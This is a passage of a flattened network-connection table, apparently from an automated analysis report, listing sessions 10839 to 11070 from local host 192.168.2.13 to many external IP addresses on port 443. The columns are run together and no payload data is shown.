                              10839192.168.2.133880864.149.76.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10840192.168.2.1350730223.117.60.150443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10841192.168.2.1348698106.253.6.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10842192.168.2.133287692.71.79.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10843192.168.2.1355392168.121.187.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10844192.168.2.134132876.188.244.229443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10845192.168.2.1355506102.35.82.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10846192.168.2.1341340175.244.19.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10847192.168.2.1352386144.221.182.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10848192.168.2.1358972186.74.236.64443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10849192.168.2.1347508198.5.239.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10850192.168.2.13453261.41.133.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10851192.168.2.1351562138.201.168.238443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10852192.168.2.1352094107.180.85.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10853192.168.2.1340884165.242.252.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10854192.168.2.1353820213.152.61.205443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10855192.168.2.1350422132.111.26.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10856192.168.2.1335328174.177.48.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10857192.168.2.1357870166.164.251.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10858192.168.2.1346554167.245.220.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10859192.168.2.1354682175.84.151.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10860192.168.2.135175867.32.112.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10861192.168.2.1334428140.133.82.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10862192.168.2.1357982134.136.155.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10863192.168.2.134413247.168.117.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10864192.168.2.135342032.222.48.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10865192.168.2.134560454.86.141.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10866192.168.2.1349378129.191.163.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10867192.168.2.13546264.202.5.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10868192.168.2.1354146125.26.41.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10869192.168.2.134841261.71.24.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10870192.168.2.135480212.210.152.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10871192.168.2.135272435.254.108.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10872192.168.2.1352692204.51.176.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10873192.168.2.1343120128.44.85.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10874192.168.2.134190817.31.142.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10875192.168.2.1340022190.183.75.239443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10876192.168.2.134764827.190.5.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10877192.168.2.1358392117.25.12.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10878192.168.2.134159664.224.76.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10879192.168.2.1354710149.38.89.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10880192.168.2.1348892182.58.193.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10881192.168.2.1347018125.88.80.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10882192.168.2.1359088161.130.239.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10883192.168.2.1359786169.229.152.118443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10884192.168.2.134945680.178.60.150443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10885192.168.2.1347402198.244.252.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10886192.168.2.13492645.81.209.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10887192.168.2.1341292131.163.87.210443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10888192.168.2.1353148191.151.162.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10889192.168.2.133437474.73.100.6443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10890192.168.2.1355842132.140.254.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10891192.168.2.133953852.107.193.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10892192.168.2.1350548171.242.148.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10893192.168.2.134068657.196.246.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10894192.168.2.134235867.18.1.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10895192.168.2.134863649.105.61.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10896192.168.2.1336126130.63.171.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10897192.168.2.1334196115.50.152.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10898192.168.2.1352158118.61.162.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10899192.168.2.134172264.134.213.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10900192.168.2.134283834.124.46.22443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10901192.168.2.1344270182.230.50.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10902192.168.2.1353070192.12.245.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10903192.168.2.1347612173.88.64.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10904192.168.2.1334300111.217.79.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10905192.168.2.134324013.96.19.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10906192.168.2.135505038.36.11.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10907192.168.2.135801296.143.141.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10908192.168.2.1336202124.149.73.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10909192.168.2.1356892188.84.122.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10910192.168.2.1338822102.100.177.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10911192.168.2.133871425.20.254.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10912192.168.2.1339318147.212.80.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10913192.168.2.135032042.94.107.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10914192.168.2.1334866223.146.3.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10915192.168.2.134668065.119.37.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10916192.168.2.134617674.88.83.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10917192.168.2.134100244.86.236.119443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10918192.168.2.135777068.252.131.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10919192.168.2.134111296.73.77.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10920192.168.2.135626412.48.201.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10921192.168.2.1355456118.57.82.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10922192.168.2.1336768118.164.77.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10923192.168.2.1348766213.201.250.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10924192.168.2.136076466.219.64.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10925192.168.2.13516888.132.129.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10926192.168.2.1352936108.38.10.247443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10927192.168.2.1358410194.44.239.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10928192.168.2.134408689.27.24.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10929192.168.2.135424288.119.112.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10930192.168.2.1347456221.198.239.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10931192.168.2.1360156115.45.65.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10932192.168.2.1346908222.96.201.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10933192.168.2.1337256155.179.124.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10934192.168.2.1339222209.19.150.234443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10935192.168.2.1346220193.27.246.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10936192.168.2.135924692.15.5.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10937192.168.2.135573440.2.227.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10938192.168.2.1344048129.187.169.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10939192.168.2.133530687.231.95.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10940192.168.2.1346676202.85.147.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10941192.168.2.1335696220.254.16.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10942192.168.2.1348212219.65.33.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10943192.168.2.1350694147.237.194.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10944192.168.2.134810690.133.179.238443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10945192.168.2.1342088145.57.88.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10946192.168.2.1340844131.82.255.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10947192.168.2.1357058220.213.36.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10948192.168.2.1350550176.43.68.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10949192.168.2.13491428.101.69.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10950192.168.2.135520285.82.228.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10951192.168.2.1338448175.197.76.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10952192.168.2.135006680.157.195.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10953192.168.2.133433423.77.80.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10954192.168.2.1345958156.28.8.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10955192.168.2.135666664.66.136.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10956192.168.2.1358558133.156.86.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10957192.168.2.1336340135.180.122.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10958192.168.2.1341042149.222.101.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10959192.168.2.134853013.7.118.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10960192.168.2.1351542211.187.125.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10961192.168.2.134901281.182.51.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10962192.168.2.134434671.117.51.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10963192.168.2.1352788117.254.93.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10964192.168.2.133369666.119.176.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10965192.168.2.1358326142.165.36.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10966192.168.2.136097449.117.163.222443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10967192.168.2.134218463.44.168.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10968192.168.2.13582502.164.252.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10969192.168.2.1353934151.253.93.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10970192.168.2.1348452125.221.13.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10971192.168.2.13330841.103.26.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10972192.168.2.1359482126.54.42.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10973192.168.2.133883835.219.227.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10974192.168.2.1341578169.169.74.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10975192.168.2.1341300187.1.16.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10976192.168.2.1345632198.75.62.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10977192.168.2.1350382134.208.84.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10978192.168.2.135213065.35.81.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10979192.168.2.1343358218.230.176.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10980192.168.2.135138045.142.211.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10981192.168.2.1360268180.117.218.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10982192.168.2.13557849.168.182.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10983192.168.2.133946895.159.114.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10984192.168.2.1340558105.118.131.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10985192.168.2.135467296.177.137.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10986192.168.2.1358076124.4.130.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10987192.168.2.134141675.229.168.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10988192.168.2.1343816190.98.240.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10989192.168.2.1348566198.199.183.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10990192.168.2.1343484101.23.236.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10991192.168.2.1342896136.49.33.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10992192.168.2.1353946122.176.206.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10993192.168.2.133606865.246.196.228443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10994192.168.2.134702227.160.138.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10995192.168.2.1343288177.117.3.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10996192.168.2.1345080167.235.59.200443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10997192.168.2.134133049.235.12.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10998192.168.2.134034025.237.231.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10999192.168.2.1345182159.154.102.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11000192.168.2.134019295.70.89.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11001192.168.2.1339164140.13.83.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11002192.168.2.134101094.169.162.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11003192.168.2.1338384123.154.248.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11004192.168.2.1344780157.170.254.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11005192.168.2.1353272159.249.181.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11006192.168.2.1342180201.208.215.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11007192.168.2.1359522150.188.69.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11008192.168.2.134052451.54.147.228443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11009192.168.2.1356744109.94.67.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11010192.168.2.135269632.0.25.255443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11011192.168.2.1344470112.110.84.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11012192.168.2.13402922.42.63.26443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11013192.168.2.1352214194.1.243.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11014192.168.2.1339384223.134.132.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11015192.168.2.134852892.16.31.183443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11016192.168.2.136008067.204.88.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11017192.168.2.135310232.73.107.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11018192.168.2.133556080.37.75.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11019192.168.2.1347390199.87.160.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11020192.168.2.134943487.108.157.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11021192.168.2.1352134184.124.170.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11022192.168.2.1353150181.102.7.78443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11023192.168.2.135516468.31.67.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11024192.168.2.133619051.142.41.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11025192.168.2.1335774218.100.0.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11026192.168.2.135908265.252.241.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11027192.168.2.134906846.158.77.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11028192.168.2.134366842.4.105.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11029192.168.2.133768265.77.47.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11030192.168.2.1350418177.207.216.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11031192.168.2.135300438.77.120.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11032192.168.2.1358310120.62.83.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11033192.168.2.133811620.74.5.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11034192.168.2.1337900118.165.166.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11035192.168.2.1341758205.160.200.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11036192.168.2.1357254166.68.234.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11037192.168.2.1349780134.173.92.228443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11038192.168.2.1342622211.38.50.78443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11039192.168.2.1353132136.119.181.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11040192.168.2.1340190197.79.78.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11041192.168.2.134128063.196.6.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11042192.168.2.135017444.85.21.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11043192.168.2.133924837.131.35.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11044192.168.2.1341316148.192.230.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11045192.168.2.1360244208.137.154.239443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11046192.168.2.133786645.9.11.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11047192.168.2.13557524.190.169.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11048192.168.2.1345848135.206.101.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11049192.168.2.1339974192.179.111.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11050192.168.2.1348180133.129.199.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11051192.168.2.134985445.36.235.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11052192.168.2.1355856146.14.136.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11053192.168.2.135644240.54.85.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11054192.168.2.134091861.91.218.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11055192.168.2.1347744190.239.155.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11056192.168.2.1345120193.237.31.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11057192.168.2.134886872.136.245.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11058192.168.2.134362286.216.106.132443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11059192.168.2.135984651.176.190.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11060192.168.2.134769271.236.89.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11061192.168.2.1345272104.12.197.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11062192.168.2.1353384210.232.148.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11063192.168.2.1360092160.155.92.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11064192.168.2.134354457.222.129.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11065192.168.2.1337932205.108.76.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11066192.168.2.1360826203.61.131.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11067192.168.2.1355042112.206.140.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11068192.168.2.135728051.26.151.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11069192.168.2.1338208176.68.185.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11070192.168.2.1344796143.172.183.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
